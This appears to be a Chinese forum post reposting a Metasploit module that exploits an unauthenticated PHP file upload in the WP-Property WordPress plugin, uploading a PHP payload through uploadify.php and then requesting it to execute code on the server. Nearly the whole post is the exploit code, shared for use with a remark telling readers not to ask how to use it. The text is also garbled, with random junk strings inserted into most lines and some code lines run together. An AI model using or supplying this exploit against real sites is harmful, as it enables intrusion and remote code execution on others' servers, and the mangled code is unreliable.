WordPress WP-Property PHP 文件上传漏洞
d8 }. Q0 l- w; F X0 S4 p% l8 L& _- x# ~, d4 z! c! a
## # This file is part of the Metasploit Framework and may be subject to
# W8 K/ c5 c& K2 u3 U' d
: K. q" j# _* W# redistribution and commercial restrictions. Please see the Metasploit
( F' L( D$ r/ c$ t' L2 S9 t/ I S
' g" ^( h* ~* |" ]+ @$ F7 i# Framework web site for more information on licensing and terms of use.% P+ \0 { b8 f$ j- ^; {& F. ?
- Y" }4 K$ U8 G1 B% g
# http://metasploit.com/framework/ ##9 A4 G* F4 k/ S6 _* @/ s
9 I4 |8 Y' M( Y+ C' Y& t: }2 N4 t
. x& t* p8 D, Y0 H5 s) O, I1 Q7 g* I. X9 K% h
. A1 H! o- V& x! A/ v0 \- H0 i
% E2 o+ M! X% ]* y6 f" @* j% Trequire 'msf/core'
b7 t- s. E$ R# R& Q9 rrequire 'msf/core/exploit/php_exe'
% `7 {5 E S. ?/ m
+ w; M! z( s# |. y( m5 Mclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
* C/ n7 [) ~3 {9 z. s'Description' => %q{
8 x% z8 ?. X" Z! P& YThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>1 ~9 J. r! G, w Q
[- k, T' b, Z7 G* B4 b& h
'Sammy FORGIT', # initial discovery4 O1 e, c# N- |4 l7 Q# D# Q
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
5 j1 [1 r& Z0 f! ~! c: U],
B/ j* _6 ]# g'License' => MSF_LICENSE,
9 m [9 b0 V- ~3 H0 V/ G'References' =>& [- L9 e2 A( j! p
[
- A" G/ b1 D- z1 O8 o[ 'OSVDB', '82656' ],
% Z7 H9 x' n# t" U1 c" A. i- {[ 'BID', '53787' ],
( h' A; S8 w! v' {8 H[ 'EDB', '18987'],$ j6 V& c& V- I5 J6 C2 M* P
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]1 p# Z, P5 z# Q8 I/ E
],$ b0 F: O) ]3 \% S
'Payload' =>
) e& M4 W \& {* S. L{4 G- @" }/ f9 g1 D% R4 ^% N0 z
'BadChars' => "\x00",/ n) z# J% S5 k- f8 \! X/ X& D
},2 k8 U- c- C3 ?" a: G4 d
'Platform' => 'php',% f7 x) x& |" u! B# o7 ]' U
'Arch' => ARCH_PHP,
- w6 C3 t: D5 o9 R% p C1 B# ~'Targets' =>
( [7 H2 \8 T+ F; a2 B[, k! S! v& B9 {/ D9 g
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
# x7 [8 G3 c1 V# [" w7 i" I5 l e[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 S+ M- O' w( F
],/ L' y: t: G7 B" K8 b. [
'DefaultTarget' => 0,
$ {0 X) q/ D- o'DisclosureDate' => 'Mar 26 2012'))
- _6 V2 _7 O. g/ s; q# o" Q
4 M( m, v4 T [5 f" s) O! tregister_options(
+ z9 c- q0 L D: _5 k1 @1 ^, d2 B[/ j1 ^ Z2 H, ?5 {
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
; x' u0 q) M' ~; e9 l1 D], self.class)4 ^4 a H, ~1 G5 h3 v
end
4 c1 W9 l' J8 Y4 A8 s. s
: l0 E& J/ a q; [) N, [7 H% Ddef check$ Z# B& A& Z& V% m
uri = target_uri.path4 r0 J# K. z- A# `9 r
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
' s0 @6 p3 S. F) R* }'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
2 G" {2 m+ R' i})
' l# q% w# ^) l% k }/ Z8 ~0 l0 k2 Z% c$ Q& z
if not res or res.code != 200
9 G4 G7 a2 n4 o# `+ k7 Zreturn Exploit::CheckCode::Unknown& W# E& t: J, \- n' k
end: m0 F0 }2 }9 A. C+ {- S' X
/ _3 I$ O5 j% p# kreturn Exploit::CheckCode::Appears1 S; }6 E1 `, h$ A Q
end- f5 D5 v( r& X" s
$ L. U& B1 m( `2 h C( S
def exploit
) k, k0 ~$ z Y/ H3 y- I: w: ouri = target_uri.path
1 w2 O$ N' _4 n l( M' Kuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)$ f6 c( _6 T* X% V& B: _ M
2 t7 Z0 `5 ?* c, @% p3 U4 s1 ldata = Rex::MIME::Message.new
$ ?/ U8 \! q1 k3 Tdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\""), v9 y; D3 l7 l! |2 T
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")/ G$ R. `2 N. y! F; d, l3 h; L* E
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')$ n5 A- r, b; [+ R9 B5 ~8 m7 m$ u
; H. o: }! X3 ]8 E, S& J w) z
print_status("#{peer} - Uploading payload #{@payload_name}")2 a; P: O: u9 b$ j) V* R
res = send_request_cgi({
7 c3 M; y" l) u/ [$ m- N2 u'method' => 'POST',
m7 }) C& l7 ?4 K'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
" O: k9 Y1 K; e, g9 h: x'ctype' => "multipart/form-data; boundary=#{data.bound}"," v8 O+ S$ v- \% `0 R
'data' => post_data" n! E! V& Q* l/ v, N$ s
})
, {9 ~, g8 X+ R: @' v' D- y
0 X4 j3 ^ N) v0 cif not res or res.code != 200 or res.body !~ /#{@payload_name}/! t2 {/ E0 L" x$ b
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
$ U% E7 K3 c/ t6 E. Y0 p. hend
9 A1 [* v) j6 v- U: U$ ?4 F4 l0 {/ l7 E% N( L) K
upload_uri = res.body
* |8 O4 j$ W4 g6 n0 S- O. `' w/ _8 M/ C& _
print_status("#{peer} - Executing payload #{@payload_name}")$ b8 I" {4 p/ ^! a- @5 \' V, |/ N
res = send_request_raw({
8 e# f' x/ k W7 _, O* m! _4 d'uri' => upload_uri,
% N5 I+ M$ ~% L* }9 V/ ~'method' => 'GET'" p o9 ?9 ?! o/ u9 Z9 Q
})& u! N# t8 _9 [5 i6 c! Z
end
! ~- I) O3 a3 nend
# `. `2 c9 C3 H2 |. d+ F8 i2 u* H0 T: v
不要问我这写的是什么 怎么利用 我是说msf.
1 S0 j, J. n2 ^& `) @( `! _0 X* H/ w- A- H
|
发表于 2013-1-4 19:51:30
收藏
支持
反对